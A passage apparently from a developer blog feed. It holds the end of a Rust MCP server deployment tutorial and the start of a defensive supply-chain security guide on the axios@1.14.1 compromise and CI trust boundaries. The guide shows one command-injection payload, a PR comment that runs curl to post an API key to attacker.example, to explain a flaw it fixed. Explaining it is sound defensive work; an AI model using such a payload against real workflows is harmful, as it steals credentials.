&lt;p&gt;Then lint-check the code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make lint
&lt;span class="go"&gt;Linting code...
    Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.61s
&lt;/span&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; 
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And run the local tests:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make &lt;span class="nb"&gt;test&lt;/span&gt;
&lt;span class="go"&gt;Running tests...
    Finished `test` profile [unoptimized + debuginfo] target(s) in 0.22s
     Running unittests src/main.rs (target/debug/deps/mcp_lightsail_rust_aws-926af5aee1927183)

running 1 test
test tests::test_greeting ... ok

&lt;/span&gt;&lt;span class="gp"&gt;test result: ok. 1 passed;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;0 failed&lt;span class="p"&gt;;&lt;/span&gt; 0 ignored&lt;span class="p"&gt;;&lt;/span&gt; 0 measured&lt;span class="p"&gt;;&lt;/span&gt; 0 filtered out&lt;span class="p"&gt;;&lt;/span&gt; finished &lt;span class="k"&gt;in &lt;/span&gt;0.00s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The last step is to build the production version:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make release
&lt;span class="go"&gt;Building Release...
   Compiling mcp-lightsail-rust-aws v1.0.0 (/home/xbill/gemini-cli-aws/mcp-lightsail-rust-aws)
    Finished `release` profile [optimized] target(s) in 43.31s
&lt;/span&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; 
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The MCP server can be started locally:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/mcp-adk-rust/mcp-cloudrun-rust$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make start
&lt;span class="go"&gt;Building Release...
    Finished `release` profile [optimized] target(s) in 0.14s
Starting the MCP server...
Server started with PID 1569
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then Gemini CLI is used as an MCP client:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;🟢 local-rust - Ready (1 tool)
  Tools:
  - mcp_local-rust_greeting
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The MCP tool can then be tested:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; mcp_local-rust_greeting local

╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Action Required │
│ │
│ ? greeting (local-rust MCP Server) {"message":"local"} │
│ │
│ MCP Server: local-rust │
│ Tool: greeting │
│ │
│ MCP Tool Details: │
│ (press Ctrl+O to expand MCP tool details) │
│ Allow execution of MCP tool "greeting" from server "local-rust"? │
│ │
│ 1. Allow once │
│ 2. Allow tool for this session │
│ 3. Allow all server tools for this session │
│ ● 4. Allow tool for all future sessions ~/.gemini/policies/auto-saved.toml │
│ 5. No, suggest changes (esc) │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

✦ The mcp_local-rust_greeting tool was executed with the message "local", returning:
  "Hello World MCP! local"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Deploy to Lightsail
&lt;/h4&gt;

&lt;p&gt;A basic Dockerfile is used to build an image for deployment:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make deploy
&lt;span class="go"&gt;Building the Docker image...
[+] Building 5.3s (15/15) FINISHED docker:default
&lt;/span&gt;&lt;span class="gp"&gt; =&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;internal] load build definition from Dockerfile 0.0s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
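&lt;p&gt;The repository's Dockerfile is not reproduced here, but a typical multi-stage layout for a Rust MCP server looks like the sketch below. The image tags and binary name are illustrative:&lt;/p&gt;

```dockerfile
# Illustrative multi-stage build: compile the release binary, then copy it
# into a slim runtime image so the final container carries no Rust toolchain.
FROM rust:1.84 AS builder
WORKDIR /app
COPY . .
RUN cargo build --release

FROM debian:bookworm-slim
COPY --from=builder /app/target/release/mcp-lightsail-rust-aws /usr/local/bin/server
EXPOSE 8080
CMD ["server"]
```

&lt;p&gt;The two-stage split keeps the deployed image small, which matters for Lightsail's fixed-price container sizes.&lt;/p&gt;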



&lt;p&gt;Get the Endpoint:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make endpoint
&lt;span class="go"&gt;https://mcp-lightsail-rust-aws.6wpv8vensby5c.us-east-1.cs.amazonlightsail.com/
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
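&lt;p&gt;Before wiring the endpoint into Gemini CLI, you can sketch a smoke test by hand. The JSON-RPC &lt;code&gt;initialize&lt;/code&gt; body below is a generic MCP handshake, not output captured from this server; uncomment the &lt;code&gt;curl&lt;/code&gt; line to send it to the deployed &lt;code&gt;/mcp&lt;/code&gt; path:&lt;/p&gt;

```shell
# Generic MCP initialize request (protocol version is illustrative).
MCP_URL="https://mcp-lightsail-rust-aws.6wpv8vensby5c.us-east-1.cs.amazonlightsail.com/mcp"
INIT_BODY='{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"probe","version":"0.1"}}}'
# curl -s -X POST "$MCP_URL" -H 'Content-Type: application/json' -d "$INIT_BODY"
printf '%s\n' "$INIT_BODY"
```

&lt;p&gt;A healthy server answers with a JSON-RPC result describing its capabilities; an error or timeout points at the container, not the CLI configuration.&lt;/p&gt;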



&lt;p&gt;Check Gemini MCP settings:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"mcpServers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"aws-lightsail-rust"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"httpUrl"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://mcp-lightsail-rust-aws.6wpv8vensby5c.us-east-1.cs.amazonlightsail.com/mcp"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"local-rust"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"httpUrl"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"http://127.0.0.1:8080/mcp"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The service will be visible on the Lightsail console:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4skqmyztkiwvlm1yvspw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4skqmyztkiwvlm1yvspw.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Final Test
&lt;/h4&gt;

&lt;p&gt;Start up Gemini CLI and check the MCP server status:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;🟢 aws-lightsail-rust - Ready (1 tool)
  Tools:
  - mcp_aws-lightsail-rust_greeting

&amp;gt; mcp_aws-lightsail-rust_greeting Hello LightSail!

  Executing Lightsail Greeting: Executing the greeting tool for Amazon Lightsail Rust MCP server.

╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ ✓ greeting (aws-lightsail-rust MCP Server) {"message":"Hello LightSail!"} │
│ │
│ Hello World MCP! Hello LightSail! │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

✦ The mcp_aws-lightsail-rust_greeting tool returned:

  Hello World MCP! Hello LightSail!

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Summary
&lt;/h4&gt;

&lt;p&gt;A complete HTTP-transport MCP server was built in Rust and tested locally with Gemini CLI. The entire solution was then deployed to AWS Lightsail, and the remote MCP server was validated from the local Gemini CLI.&lt;/p&gt;

</description>
      <category>awslightsail</category>
      <category>dockerfiles</category>
      <category>mcps</category>
      <category>gemini</category>
    </item>
    <item>
      <title>Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1</title>
      <dc:creator>Ahmad Kanj</dc:creator>
      <pubDate>Fri, 08 May 2026 12:48:03 +0000</pubDate>
      <link>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-1o4m</link>
      <guid>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-1o4m</guid>
      <description>&lt;p&gt;On March 30, 2026, an attacker who had stolen an &lt;code&gt;axios&lt;/code&gt; maintainer's npm publish credentials pushed &lt;code&gt;axios@1.14.1&lt;/code&gt; to the registry. The version looked like a normal patch, a single-digit bump from 1.14.0. It was live for roughly three hours before the maintainer rotated credentials and the version was unpublished.&lt;/p&gt;

&lt;p&gt;Three hours, on a Monday, during peak CI/CD hours across multiple time zones. Any team running &lt;code&gt;pnpm install&lt;/code&gt; or &lt;code&gt;npm install&lt;/code&gt; against a &lt;code&gt;^1.14.0&lt;/code&gt; constraint pulled &lt;code&gt;1.14.1&lt;/code&gt; automatically. (&lt;code&gt;^1.14.0&lt;/code&gt; means "any 1.x.y ≥ 1.14.0"; most package managers express the same idea: &lt;code&gt;~=&lt;/code&gt; in pip, &lt;code&gt;^&lt;/code&gt; in Cargo, &lt;code&gt;~&amp;gt;&lt;/code&gt; in Gemfile.) No CVE was published during the window. SAST tools had nothing to flag.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; added one new transitive dependency (a dependency-of-a-dependency, pulled in indirectly): &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;. That package's &lt;code&gt;postinstall&lt;/code&gt; script ran &lt;code&gt;node setup.js&lt;/code&gt;, which downloaded a Python-based RAT (Remote Access Trojan) from a C2 (command-and-control) server, exfiltrated environment variables and cloud credentials, and attempted to establish persistence on the build host. (&lt;code&gt;postinstall&lt;/code&gt; is the canonical Node footgun, a hook the package manager runs automatically after install, with analogues in pip's &lt;code&gt;setup.py&lt;/code&gt; build hooks, Ruby's &lt;code&gt;gem extconf&lt;/code&gt;, and Cargo's &lt;code&gt;build.rs&lt;/code&gt;.) The compromise wouldn't have been visible to anyone glancing at the lockfile diff: a new transitive in a stable utility, the kind of churn most teams approve without thinking.&lt;/p&gt;

&lt;p&gt;Three hours is forever in CI. By the time npm pulled the version, the bytes had already shipped to thousands of build hosts.&lt;/p&gt;

&lt;p&gt;Two weeks before that incident, I was reading through a workflow in our own repo that lets engineers trigger an LLM code review by commenting &lt;code&gt;/review&lt;/code&gt; on a pull request. I stopped on this line:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/workflows/opencode-review.yml:108&lt;/span&gt;
&lt;span class="s"&gt;COMMENT_BODY="${{ github.event.comment.body || '' }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;if:&lt;/code&gt; block above it gated only on &lt;code&gt;startsWith(comment.body, '/review')&lt;/code&gt;. There was no &lt;code&gt;comment.author_association&lt;/code&gt; check. Anyone who could comment on a PR, including a drive-by from a public fork, could trigger this workflow. The job loaded &lt;code&gt;OPENROUTER_API_KEY&lt;/code&gt; from AWS Secrets Manager, and ran with &lt;code&gt;pull-requests: write&lt;/code&gt;, &lt;code&gt;issues: write&lt;/code&gt;, and AWS OIDC (OpenID Connect short-lived workload identity, used here instead of long-lived API keys) in scope.&lt;/p&gt;

&lt;p&gt;A comment body of &lt;code&gt;/review"; curl -X POST attacker.example/x -d "$OPENROUTER_API_KEY&lt;/code&gt; would have run on the next CI build. CWE-78: OS command injection, untrusted input concatenated into a shell command. Found, scoped, fixed in a four-line diff.&lt;/p&gt;
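&lt;p&gt;The remediation pattern (a sketch of the approach, not our exact four-line diff) is to gate on &lt;code&gt;author_association&lt;/code&gt; and to hand the comment body to the shell as an environment variable, so it arrives as data rather than command text:&lt;/p&gt;

```yaml
# Sketch: authorize the commenter, and never interpolate the body into shell.
if: startsWith(github.event.comment.body, '/review')
steps:
  - name: review
    if: contains(fromJSON('["OWNER","MEMBER","COLLABORATOR"]'), github.event.comment.author_association)
    env:
      COMMENT_BODY: ${{ github.event.comment.body }}
    run: |
      # "$COMMENT_BODY" expands as a variable, not as shell source
      printf '%s\n' "$COMMENT_BODY"
```

&lt;p&gt;With &lt;code&gt;env:&lt;/code&gt;, the runner writes the value into the process environment; the shell never parses attacker-controlled text as code.&lt;/p&gt;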

&lt;p&gt;Two attacks, very different mechanics. axios was a credential-theft → publish → postinstall chain at the registry boundary. The CWE-78 was a comment-string interpolation at the workflow boundary. The connection: in both cases the attacker didn't write code "in" the repo. They injected code by abusing a trust relationship. We trusted axios's npm releases; we trusted GitHub event input. The perimeter is no longer your application. It's everything that runs before, during, and after your build, and the defense has to live in those same places.&lt;/p&gt;

&lt;p&gt;I work on a monorepo spanning multiple projects (a single git repository hosting many services and libraries, JavaScript and TypeScript in our case, but the framework below maps to any monorepo or polyrepo, any language). A month after &lt;code&gt;axios@1.14.1&lt;/code&gt; shipped, a Slack message landed in our channel: &lt;em&gt;"we have Wiz, SonarCloud, gitleaks, Renovate, but are we good?"&lt;/em&gt; Seven days later I had a triaged P0/P1/P2 list (12 P0s on auth, secrets, registry trust; 18 P1s on pinning, permissions, lifecycle; 17 P2s on logging, SBOM, hardening) and a branch with 48 files changed and +2,487 / −646 lines of supply-chain controls.&lt;/p&gt;

&lt;p&gt;What follows is the framework I use, the specific findings I hit, the trade-offs I made, and the equivalent control in your stack, whether your repo is npm, pip, Maven, Go modules, Cargo, or RubyGems; whether your CI is GitHub Actions, GitLab, Buildkite, or Jenkins. The worked example here is pnpm and GitHub Actions because that's where I shipped it. The boundaries are stack-neutral.&lt;/p&gt;




&lt;h2&gt;
  
  
  Where the attack surface actually lives now
&lt;/h2&gt;

&lt;p&gt;Your application's attack surface is bounded. A handful of endpoints, an auth system, a database. You can audit it, pen-test it, threat-model it on a whiteboard in an afternoon.&lt;/p&gt;

&lt;p&gt;Your supply chain is not bounded. It's the transitive closure of every package you import, every CI Action / GitLab include / Buildkite plugin in every workflow, every base image &lt;code&gt;FROM&lt;/code&gt; line in every Dockerfile, every binary your CI runner downloads at build time, every preset, every fork, every "trusted" community helper.&lt;/p&gt;

&lt;p&gt;The math doesn't work in your favour. A typical mid-sized application resolves on the order of 1,000–3,000 transitive dependencies in its lockfile (the resolved-versions file your package manager writes: &lt;code&gt;package-lock.json&lt;/code&gt;, &lt;code&gt;Pipfile.lock&lt;/code&gt;, &lt;code&gt;Cargo.lock&lt;/code&gt;, &lt;code&gt;Gemfile.lock&lt;/code&gt;, &lt;code&gt;go.sum&lt;/code&gt;). A typical CI pipeline chains 10–30 third-party Actions / plugins. Across a multi-year horizon, the probability that none of those maintainers gets phished, social-engineered, or leaks a publish token approaches zero.&lt;/p&gt;
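&lt;p&gt;You can put a number on your own exposure in one line. The pattern below targets a pnpm-style lockfile and is approximate; a tiny sample is inlined so the command is self-contained, but against a real repo you would point the &lt;code&gt;grep&lt;/code&gt; at your committed lockfile:&lt;/p&gt;

```shell
# Rough census of resolved packages in a (sample) pnpm-style lockfile:
# count top-level package entries, which are indented by exactly two spaces.
SAMPLE='packages:
  axios@1.14.0:
    resolution: {integrity: sha512-aaa}
  follow-redirects@1.15.6:
    resolution: {integrity: sha512-bbb}'
printf '%s\n' "$SAMPLE" | grep -c '^  [a-z@]'
```

&lt;p&gt;Run against a real mid-sized app, the count lands in the four digits, which is the point: no one is reviewing that by hand.&lt;/p&gt;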

&lt;p&gt;Recent incidents to anchor frequency:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;2018: &lt;code&gt;event-stream&lt;/code&gt; (npm advisory 737):&lt;/strong&gt; maintainer handed package to a malicious "helpful contributor" who added a payload in a sub-dependency. Targeted exfiltration of private keys from the Copay/&lt;code&gt;copay-dash&lt;/code&gt; Bitcoin wallet specifically; conditional payload, no effect on other consumers.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;ua-parser-js&lt;/code&gt;:&lt;/strong&gt; npm account takeover. Crypto miner and credential theft on every install. ~4 hours before takedown.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;codecov&lt;/code&gt; bash uploader (CVE-2021-32699):&lt;/strong&gt; modified upload script harvested CI environment variables. HashiCorp, Twilio, Confluent affected.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2022: &lt;code&gt;node-ipc&lt;/code&gt; (CVE-2022-23812):&lt;/strong&gt; maintainer protestware. Wiped files on Russian and Belarusian IPs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;xz-utils&lt;/code&gt; (CVE-2024-3094):&lt;/strong&gt; multi-year insider. The "Jia Tan" persona spent ~2 years building trust before merging an OpenSSH authentication backdoor via &lt;code&gt;liblzma&lt;/code&gt; linkage with a specific Ed448 key. Discovered by Postgres engineer Andres Freund investigating ~500 ms of &lt;code&gt;sshd&lt;/code&gt; login latency, before the affected versions reached most stable distributions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;@solana/web3.js&lt;/code&gt; (GHSA-7493-mqf3-cv5g):&lt;/strong&gt; npm token compromise. Wallet drainer in published versions for ~5 hours.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: &lt;code&gt;tj-actions/changed-files&lt;/code&gt; (CVE-2025-30066):&lt;/strong&gt; chained through &lt;code&gt;reviewdog/action-setup&lt;/code&gt; (CVE-2025-30154) → stolen PAT → retroactive semver-tag rewrite. ~218 repos confirmed leaked secrets out of ~23,000 references per StepSecurity / Wiz post-incident telemetry.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Shai-Hulud npm worm:&lt;/strong&gt; the first true self-replicating npm worm. A &lt;code&gt;postinstall&lt;/code&gt; harvested maintainer npm tokens and re-published the worm into every other package the victim maintained. ~180 packages compromised across multiple maintainer namespaces.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Nx &lt;code&gt;s1ngularity&lt;/code&gt; worm:&lt;/strong&gt; npm postinstall on compromised Nx versions harvested GitHub PATs, SSH keys, and crypto wallets from build hosts; backdoored downstream &lt;code&gt;nx-init-&lt;/code&gt; repositories. Directly relevant to anyone on an Nx monorepo.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2026: &lt;code&gt;axios@1.14.1&lt;/code&gt;:&lt;/strong&gt; as above.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Strip the variations and you get four primitives that every modern attack chains: &lt;strong&gt;dependency injection&lt;/strong&gt; (typosquats, dependency confusion, maintainer compromise), &lt;strong&gt;build-time injection&lt;/strong&gt; (postinstall hooks, curl-bashed installers, malicious Actions), &lt;strong&gt;mutable-reference rewrite&lt;/strong&gt; (tag rewrites, branch tracking, CDN URLs without integrity), and &lt;strong&gt;trust-relationship abuse&lt;/strong&gt; (compromise a tooling vendor, an MFA, a token in a CI log). axios chained (4) → (1) → (2). tj-actions chained (4) → (1) → (3) → (2). Any single layer of defense would have broken either chain. Most repos had none of them.&lt;/p&gt;




&lt;h2&gt;
  
  
  The twelve boundaries
&lt;/h2&gt;

&lt;p&gt;Security engineers think in &lt;strong&gt;boundaries&lt;/strong&gt;: points where trust transfers from one entity to another. Each boundary is a place attackers operate and a place defenders need a control. The twelve below split into three phases: what enters your repo (1–4); what runs during your build (5–9); what ships at runtime (10–12); plus a final section on what to do when one of them fails. Some will.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 1. Source-side: what enters your repo
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 1: Source → Repository (Who can write to &lt;code&gt;main&lt;/code&gt;?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; insider with too-broad write access; accidental merge of malicious code.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt; branch protection, required reviewers, CODEOWNERS for security-sensitive paths (workflows, Dockerfiles, dependency manifests). Force-push protection on protected branches. Required status checks must include the controls below.&lt;/p&gt;

&lt;p&gt;The forge-level (GitHub / GitLab / Bitbucket / Gerrit) primitives differ; the rule is identical: humans cannot push to &lt;code&gt;main&lt;/code&gt;; only the merge bot can, and only after policy passes.&lt;/p&gt;
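&lt;p&gt;As one concrete primitive, a &lt;code&gt;CODEOWNERS&lt;/code&gt; file can force a second reviewer onto exactly the security-sensitive paths named above. The team names here are placeholders:&lt;/p&gt;

```plaintext
# Hypothetical CODEOWNERS: route supply-chain-sensitive paths to security review.
/.github/workflows/   @org/security-team
/Dockerfile           @org/security-team
pnpm-lock.yaml        @org/security-team
package.json          @org/security-team
```

&lt;p&gt;Combined with a required-review branch rule, this makes workflow and manifest changes structurally slower than ordinary code, which is the intent.&lt;/p&gt;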
&lt;h4&gt;
  
  
  Boundary 2: Maintainer → Package (Is this dependency safe?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; typosquats, dependency confusion (publishing a public package whose name shadows a private one, tricking the resolver), maintainer compromise. &lt;code&gt;axios@1.14.1&lt;/code&gt; is the canonical example of the third: published from a stolen credential, malicious for three hours, gone afterwards.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Registry-time controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pin to immutable identifiers.&lt;/strong&gt; Lockfile committed; exact-version constraints; no caret/tilde ranges in production dependencies; &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt; (or &lt;code&gt;npm ci&lt;/code&gt;, &lt;code&gt;pip install --require-hashes&lt;/code&gt;, &lt;code&gt;cargo build --locked&lt;/code&gt;, &lt;code&gt;mvn -B verify&lt;/code&gt;, &lt;code&gt;bundle install --frozen&lt;/code&gt;, &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;) in CI. The general invariant: every dependency entry resolves to a content-addressed artifact, not a URL.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cooldown on freshly published versions.&lt;/strong&gt; Reject packages younger than N days, on the premise that fresh-publish malware is detected and yanked within 24–72 hours. The premise has limits (&lt;code&gt;xz-utils&lt;/code&gt; ran for ~2 years undetected), so this control buys hours-to-days of latency, not certainty.&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;   &lt;span class="c1"&gt;# pnpm-workspace.yaml. value is in minutes; 4320 min = 72 h = 3 days&lt;/span&gt;
   &lt;span class="na"&gt;minimumReleaseAge&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4320&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; was unpublished within three hours. With &lt;code&gt;minimumReleaseAge: 4320&lt;/code&gt;, pnpm would have refused to install it for 72 hours after publish. By the time the install would have unblocked, the malicious version was already gone.&lt;/p&gt;

&lt;p&gt;Stack-neutral: pnpm has this natively. Renovate's &lt;code&gt;minimumReleaseAge&lt;/code&gt; config covers any ecosystem Renovate manages: npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform. For stacks without native or Renovate support, layer reputation signals: &lt;strong&gt;Socket&lt;/strong&gt; (behavioural risk score), &lt;strong&gt;Phylum&lt;/strong&gt; (heuristic quarantine), &lt;strong&gt;OSV-Scanner&lt;/strong&gt; + &lt;strong&gt;EPSS&lt;/strong&gt; scores for exploit-likelihood prioritisation, &lt;strong&gt;OpenSSF Scorecard&lt;/strong&gt; for upstream maintenance health, &lt;code&gt;npm audit signatures&lt;/code&gt; for registry signature verification.&lt;/p&gt;
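&lt;p&gt;For Renovate-managed stacks, the equivalent cooldown is a one-line config. This is a minimal sketch; &lt;code&gt;minimumReleaseAge&lt;/code&gt; accepts a duration string and applies across the ecosystems Renovate manages:&lt;/p&gt;

```json
{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "minimumReleaseAge": "3 days"
}
```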

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Provenance.&lt;/strong&gt; Where available, prefer packages published with provenance attestations. &lt;code&gt;npm publish --provenance&lt;/code&gt; (since npm 9.5) records a signed Sigstore provenance entry binding the published tarball to the GitHub Actions workflow that built it. PyPI Trusted Publishers + PEP 740 attestations are the Python equivalent. Maven Central PGP signatures + &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; for Java. Provenance doesn't stop a credential-theft attack like axios (the malicious workflow would still produce a signed entry), but it gives forensics a starting point.&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;
  
  
  Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; registry compromise, off-registry tarballs without integrity, mid-flight tampering.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; lockfile committed; integrity hash (&lt;code&gt;sha512:&lt;/code&gt;, &lt;code&gt;sha256:&lt;/code&gt;, OCI digest) on every entry; CI install command refuses to mutate the lockfile. &lt;strong&gt;Easy thing to miss:&lt;/strong&gt; a lockfile entry like &lt;code&gt;tarball: https://cdn.somehost.com/foo.tgz&lt;/code&gt; without an &lt;code&gt;integrity:&lt;/code&gt; field is functionally trust-the-CDN. Whoever serves that URL can serve different bytes tomorrow than they served today, and your install will accept them. Audit yours for entries where the hash field is empty or pointing to a URL the registry doesn't verify.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# tools/scripts/verify-supply-chain.sh runs in CI.&lt;/span&gt;
